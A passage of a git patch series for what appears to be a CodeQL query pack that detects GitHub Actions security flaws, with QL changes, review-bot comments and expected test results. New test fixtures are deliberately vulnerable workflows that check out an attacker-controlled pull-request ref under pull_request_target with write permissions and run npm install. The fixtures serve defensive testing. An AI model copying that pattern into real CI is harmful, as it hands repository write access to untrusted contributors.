.github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| 
.github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | +| .github/workflows/label_trusted_checkout.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:15:36:47 | 
rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:31:15:31:34 | ruby/setup-ruby@v1 | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:109:15:109:42 | actionsdesk/lfs-warning@v3.2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:144:15:144:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:148:15:148:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:347:15:347:36 | docker/login-action@v2 | 
Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:356:15:356:44 | softprops/action-gh-release@v1 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:449:15:449:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:13:10:22 | foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ 
uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | From e9dfd9ccb47779758284657133ec9a5a99938429 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 11:54:00 +0200 Subject: [PATCH 0515/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9a798b891ba..07221cd05bb 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.46 +version: 0.1.47 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 01b36fe62cd..2048e94e7ec 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.46 +version: 0.1.47 groups: [actions, queries] suites: codeql-suites extractor: javascript From 116d83da5f071d6dd5f36af7a62b2f244737240a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 15:40:41 +0200 Subject: [PATCH 0516/1267] Improve reusable workflow calls --- .../actions/dataflow/internal/DataFlowPrivate.qll | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 0d214c63c5d..1159ccb53ae 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -98,6 +98,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflow then + //result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() result = this.(ReusableWorkflow) .getLocation() 
@@ -107,7 +108,17 @@ class DataFlowCallable instanceof Cfg::CfgScope { .getLocation() .getFile() .getRelativePath() - .indexOf("/.github/workflows") + 1) + .indexOf("/.github/workflows") + 1) or + result = + this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .suffix(this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .indexOf(".github/workflows")) else if this instanceof CompositeAction then From a1e44bc918406b7a55cee9a65a054d9e62d0532e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 15:42:19 +0200 Subject: [PATCH 0517/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 07221cd05bb..8135237d6ce 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.47 +version: 0.1.48 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 2048e94e7ec..a40d5868789 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.47 +version: 0.1.48 groups: [actions, queries] suites: codeql-suites extractor: javascript From d44e7aee0ad948eab1e703ffc8e53351cf077cb7 Mon Sep 17 00:00:00 2001 
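Review bot: The `or` disjunct added to the `then` branch of `getName()` repeats the whole `getLocation().getFile().getRelativePath()` chain and differs from the first disjunct only by dropping the leading slash in the `indexOf` argument, which is easy to overlook. Binding the path once, `exists(string p | p = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() | result = p.suffix(p.indexOf(".github/workflows")))`, appears to cover both cases. Since `indexOf` yields every occurrence, a path containing the marker twice gives the callable more than one name and widens what a call can resolve to; a comment should say whether that is intended. The commented-out `//result = ...` line added in the preceding hunk should be dropped rather than committed. `getName()` starts and ends outside both hunks.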
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 22 Sep 2024 22:05:39 +0200 Subject: [PATCH 0518/1267] Cross remote Reusable Workflow analysis --- ql/lib/codeql/actions/Helper.qll | 16 +++++++ .../dataflow/internal/DataFlowPrivate.qll | 48 ++++++++++--------- .../CWE-094/CodeInjectionCritical.expected | 6 +++ .../CWE-094/CodeInjectionMedium.expected | 5 ++ .../TestRepo/.github/workflows/reusable.yml | 29 +++++++++++ .../.github/workflows/reusable_caller1.yaml | 11 +++++ .../.github/workflows/reusable_caller2.yaml | 11 +++++ .../.github/workflows/reusable_caller3.yaml | 11 +++++ .../.github/workflows/reusable_local.yml | 29 +++++++++++ .../UntrustedCheckoutCritical.expected | 4 ++ 10 files changed, 147 insertions(+), 23 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 9ac67575b8b..f6c31a6e8ea 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -252,10 +252,26 @@ predicate inPrivilegedExternallyTriggerableJob(AstNode node) { ) } +predicate calledByPrivilegedExternallyTriggerableJob(AstNode node) { + exists(ReusableWorkflow rw, ExternalJob caller, Job callee | + callee = node.getEnclosingJob() and + rw.getACaller() = caller and + rw.getAJob() = callee and + caller.isPrivilegedExternallyTriggerable() + ) + or + exists(LocalJob caller | + caller = node.getEnclosingCompositeAction().getACallerJob() and + caller.isPrivilegedExternallyTriggerable() + ) +} + predicate inPrivilegedContext(AstNode node) { inPrivilegedCompositeAction(node) or inPrivilegedExternallyTriggerableJob(node) + or + calledByPrivilegedExternallyTriggerableJob(node) } predicate inNonPrivilegedCompositeAction(AstNode node) { diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 1159ccb53ae..529bbc82087 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -89,6 +89,23 @@ class DataFlowCall instanceof Cfg::Node { Location getLocation() { result = this.(Cfg::Node).getLocation() } } +string getRepoRoot() { + exists(Workflow w | + w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + result = + w.getLocation() + .getFile() + .getRelativePath() + .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and + // exclude workflow_enum reusable workflows directory root + not result.indexOf(".github/reusable_workflows/") > -1 + or + not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and + result = "" + ) +} + /** * A Cfg scope that can be called */ 
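Review bot: `calledByPrivilegedExternallyTriggerableJob` looks only one call level up, because its first disjunct requires the direct `ExternalJob` caller of the reusable workflow to satisfy `isPrivilegedExternallyTriggerable()`. A job in a reusable workflow that is itself called from another reusable workflow is, as far as this hunk shows, not treated as privileged even when the outermost caller is. Unless `isPrivilegedExternallyTriggerable()` already accounts for callers, that is a false negative for every query built on `inPrivilegedContext`, and the limit should at least be stated. The predicate also has no QLDoc; I would add `/** Holds if node is inside a reusable workflow or composite action whose calling job is privileged and externally triggerable. */`.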
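Review bot: `getRepoRoot()` is not tied to any call or callable: it yields the path prefix of every workflow file in the database. `viableCallable` (last hunk of this file) then removes any of those values from the callee name with `replaceAll`, which strips the text wherever it occurs, not only at the start. With more than one root in a database, a call can therefore resolve to a same-named workflow under a different root, and the `.github/reusable_workflows/` case matches on path alone (whether the ref of the call is compared is not visible here). I would at least anchor the strip to the start of the name, `result.getName() = getRepoRoot() + c.getName()`, and ideally derive the root from the file of `c`. `getRepoRoot()` also needs a QLDoc that mentions the `""` result, and the stray `// or` left on the `then` line of `getName()` should go.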
@@ -97,28 +114,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflow - then - //result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() - result = - this.(ReusableWorkflow) - .getLocation() - .getFile() - .getRelativePath() - .suffix(this.(ReusableWorkflow) - .getLocation() - .getFile() - .getRelativePath() - .indexOf("/.github/workflows") + 1) or - result = - this.(ReusableWorkflow) - .getLocation() - .getFile() - .getRelativePath() - .suffix(this.(ReusableWorkflow) - .getLocation() - .getFile() - .getRelativePath() - .indexOf(".github/workflows")) + then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() // or else if this instanceof CompositeAction then @@ -154,7 +150,13 @@ class NormalReturn extends ReturnKind, TNormalReturn { } /** Gets a viable implementation of the target of the given `Call`. */ -DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } +DataFlowCallable viableCallable(DataFlowCall c) { + c.getName() = result.getName() or + c.getName() = result.getName().replaceAll(getRepoRoot(), "") or + // special case for reusable workflows downloaded by the workflow_enum action + c.getName() = + result.getName().replaceAll(getRepoRoot(), "").replaceAll(".github/reusable_workflows/", "") +} /** * Gets a node that can read the value returned from `call` with return kind diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 4123359b551..9ebd5508802 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -1,4 +1,5 @@ edges +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -29,6 +30,7 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -126,7 +128,9 @@ nodes | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -179,6 +183,7 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | 
@@ -385,6 +390,7 @@ subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index fa665b85388..c7d607f7c00 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -1,4 +1,5 @@ edges +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -29,6 +30,7 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -126,7 +128,9 @@ nodes | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -179,6 +183,7 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | diff --git a/ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml b/ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml new file mode 100644 index 00000000000..3b8a6d6dd62 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml @@ -0,0 +1,29 @@ +name: Test + +on: + workflow_call: + inputs: + branch: + type: string + default: "**" + +defaults: + run: + shell: bash + +jobs: + test: + name: Checkout + runs-on: ubuntu-latest + + permissions: + contents: write + pull-requests: write + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ inputs.branch }} + - run: | + npm install + npm run lint + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml new file mode 100644 index 00000000000..e53e55aff4c --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request_target: + +jobs: + check-execution-context: + uses: TestOrg/TestRepo/.github/workflows/reusable.yml@main + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml new file mode 100644 index 00000000000..50c0dd4901c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request: + +jobs: + check-execution-context: + uses: TestOrg/TestRepo/.github/workflows/reusable.yml@main + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml new file mode 100644 index 00000000000..1e7558b3bc0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml @@ -0,0 +1,11 @@ +name: assets-test + +on: + pull_request: + +jobs: + check-execution-context: + uses: ./.github/workflows/reusable_local.yml + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml new file mode 100644 index 00000000000..3b8a6d6dd62 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml 
